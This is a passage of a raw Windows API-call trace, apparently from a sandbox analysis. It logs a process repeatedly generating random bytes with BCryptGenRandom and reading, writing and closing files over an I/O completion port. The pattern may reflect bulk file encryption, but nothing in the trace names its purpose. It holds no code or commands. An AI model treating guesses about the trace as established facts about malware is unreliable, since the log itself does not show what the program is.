(hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0157.918] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0157.918] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0157.918] free (_Block=0x3e305b8) [0157.918] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0157.918] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0157.919] free (_Block=0x1fa91d0) [0157.919] free (_Block=0x1fa2ed8) [0157.919] free (_Block=0x1fa90b8) [0157.919] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0157.919] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0157.932] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x29d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0157.932] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0157.944] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x9a8b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0157.953] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0157.964] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.964] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0157.964] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.965] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0157.965] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0157.965] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0157.965] free (_Block=0x3e305b8) [0157.965] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0157.965] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0157.965] free (_Block=0x1fa91d0) [0157.965] free (_Block=0x1fa2ed8) [0157.966] free (_Block=0x1fa90b8) [0157.966] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0157.966] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0157.967] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x81f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.968] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0157.974] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4ada, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0158.666] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.685] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.686] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.686] CloseHandle (hObject=0x3cc) returned 1 [0158.687] free (_Block=0x3df0008) [0158.687] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.696] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.697] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0158.697] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.698] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0158.698] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0158.698] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0158.698] free (_Block=0x3e305b8) [0158.698] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0158.698] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0158.699] free (_Block=0x1fa91d0) [0158.699] free (_Block=0x1fa2ed8) [0158.699] free (_Block=0x1fa90b8) [0158.699] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.699] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.700] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x20f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.701] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.713] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2b38, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.714] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.715] CloseHandle (hObject=0x3cc) returned 1 [0158.715] free (_Block=0x3df0008) [0158.715] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.731] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.732] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0158.732] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.732] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0158.733] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0158.733] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0158.733] free (_Block=0x3e305b8) [0158.733] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0158.733] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0158.733] free (_Block=0x1fa91d0) [0158.733] free (_Block=0x1fa2ed8) [0158.733] free (_Block=0x1fa90b8) [0158.734] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.734] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.735] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x9120, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.735] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.748] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xa75a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.749] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.749] CloseHandle (hObject=0x3cc) returned 1 [0158.749] free (_Block=0x3df0008) [0158.749] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.759] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.760] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0158.760] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.760] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0158.761] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0158.761] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0158.761] free (_Block=0x3e305b8) [0158.761] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0158.761] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0158.761] free (_Block=0x1fa91d0) [0158.761] free (_Block=0x1fa2ed8) [0158.761] free (_Block=0x1fa90b8) [0158.761] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.762] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.763] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x81b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.763] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.775] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb9d1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.776] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.790] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x40f2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.794] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.808] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4b02, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.810] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.822] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x423a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.823] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.823] CloseHandle (hObject=0x3cc) returned 1 [0158.824] free (_Block=0x3df0008) [0158.824] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.835] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.836] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0158.836] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.836] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0158.837] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0158.837] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0158.837] free (_Block=0x3e305b8) [0158.837] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0158.837] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0158.837] free (_Block=0x1fa91d0) [0158.837] free (_Block=0x1fa2ed8) [0158.837] free (_Block=0x1fa90b8) [0158.837] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.838] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.839] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.839] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.869] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2dfa, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.876] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.888] CloseHandle (hObject=0x3cc) returned 1 [0158.889] free (_Block=0x3df0008) [0158.889] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.902] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x28c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0158.903] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.917] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x2ff8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0158.927] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.942] CloseHandle (hObject=0x3cc) returned 1 [0158.942] free (_Block=0x3df0008) [0158.942] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.948] CloseHandle (hObject=0x170) returned 1 [0158.948] free (_Block=0x1ff1e60) [0158.948] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.953] CloseHandle (hObject=0x308) returned 1 [0158.953] free (_Block=0x3d70450) [0158.953] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.963] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.963] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0158.963] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.964] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0158.964] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0158.965] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0158.965] free (_Block=0x3e305b8) [0158.965] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0158.965] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0158.965] free (_Block=0x1fa91d0) [0158.965] free (_Block=0x1fa2ed8) [0158.965] free (_Block=0x1fa90b8) [0158.965] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0158.966] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.977] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.977] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0158.977] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.978] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0158.978] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0158.978] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0158.978] free (_Block=0x3e305b8) [0158.978] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0158.978] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0158.979] free (_Block=0x1fa91d0) [0158.979] free (_Block=0x1fa2ed8) [0158.979] free (_Block=0x1fa90b8) [0158.979] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0158.979] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.980] CloseHandle (hObject=0x170) returned 1 [0158.980] free (_Block=0x3df0008) [0158.980] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0158.981] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4c70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0158.981] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.037] CloseHandle (hObject=0x3cc) returned 1 [0159.038] free 